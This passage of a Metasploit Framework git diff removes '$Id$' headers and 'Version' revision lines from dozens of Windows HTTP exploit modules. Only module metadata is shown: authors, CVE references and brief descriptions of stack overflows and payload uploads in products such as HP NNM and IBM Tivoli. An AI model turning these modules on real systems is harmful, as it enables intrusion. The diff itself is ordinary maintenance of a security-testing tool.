'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2466' ], diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 8f3d605131..d65c28ed17 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0183' ], diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 344a618194..0f62779c4e 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1555' ], diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index 1d529ef46b..81dccf14d1 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1554' ], diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index bd198d694f..f07b7a98bb 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1553' ], diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 73c700d521..f32b680475 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote ov.sprintf_new() is used, and gain arbitrary code execution.' }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index a1d48519c1..1ed8e2f1e3 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote overwrite data on the stack, and gain arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => ['sinn3r'], 'References' => [ diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index b3b29e21d6..ef5984c7da 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6204' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 1351e1b01f..747c49f8d9 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4179' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 4fc428c207..aca3e27935 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -45,8 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote # credit where credit is due. =) 'muts' ], - - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1697' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index 44b4bd323d..319dcd6a99 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4178' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 642cb0c93b..8a335fd5c8 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -45,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1964' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index de3912f278..7f7fcca757 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -48,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1961' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index e54d4155e3..eed839186f 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1960' ], diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index 344a69c02a..763f1c9a55 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3849' ], diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index e40e3087ab..3684b2119e 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1552' ], diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index 14c69bdd79..c8119d6bc6 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0067' ], diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 4595a621d0..291048a948 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote against a specific build (ie. NNM 7.53_01195) }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Oren Isacson', # original discovery diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index f6ea65f893..a068d83c3f 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'CVE', '2010-2703' ], diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 703bd32cd5..fe033806b8 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote cookie values, as well as several different CGI applications, can be used. '}, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Nahuel Riva', diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index ce3b85c83d..e2e1f420ca 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index 3b6002ea59..f40c8d829c 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit fu 'sinn3r' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3999' ], diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 72b6ab1db1..58750f178b 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'sinn3r' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2685' ], diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index 0066abf319..14a836a9ee 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Trancer ', # Metasploit implementation 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '58714' ], diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 82e3ef17eb..81b10b1dd2 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery and metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4769' ], diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index 5162c15886..af0e9b3ba6 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote this time. }, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-1192'], diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 8071f2862e..f13259e085 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jeremy Brown <0xjbrown[at]gmail.com>', # original public exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1220'], diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index a5491b3aeb..7f9fb8eedf 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'toto', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1868'], diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index bd8239243c..2493b14183 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4880' ], diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 21351bca2d..676368f865 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spoonm', 'Luigi Auriemma ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1561'], diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 1207678638..bd9b791fee 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # fleshed out module from advisory ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '67909'], diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index d8bf88f397..d4997cd6ea 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60549' ], diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index 8b63ee5051..fdb74f77cf 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0798'], diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index 517c42e067..c73553eaa3 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -1,8 +1,4 @@ ## -# $Id$ - -## -## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TheLeader', # original exploit 'sinn3r', # msf commit ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-2268' ], diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index 31261e648b..3a109c16ad 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 5e19f654ed..3640f8212f 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'David Maciejak ', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1348'], diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index dab57ea6ac..1275f028a6 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( 'Name' => 'ManageEngine Applications Manager Authenticated Code Execution', - 'Version' => '$Revision$', 'Description' => %q{ This module logs into the Manage Engine Appplications Manager to upload a payload to the file system and a batch script that executes the payload. }, diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 890d499fcc..c50598d2dc 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-4305'], diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 40362f3bdd..b2ee14cb74 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0684'], diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 1208018363..8f0ab99c8f 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5156' ], diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 5061c3ec76..eb44e32052 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-1200' ], diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index 485ecc6a0f..6c669086d4 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'acaro ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2271'], diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index b295668360..54e20108dd 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5112' ], diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 616e383419..4534925e48 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index 2585ca999e..69da703f12 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0992'], diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 542edb2750..51ab88bf30 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0871' ], diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index f7e720ecd9..356def0db8 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit 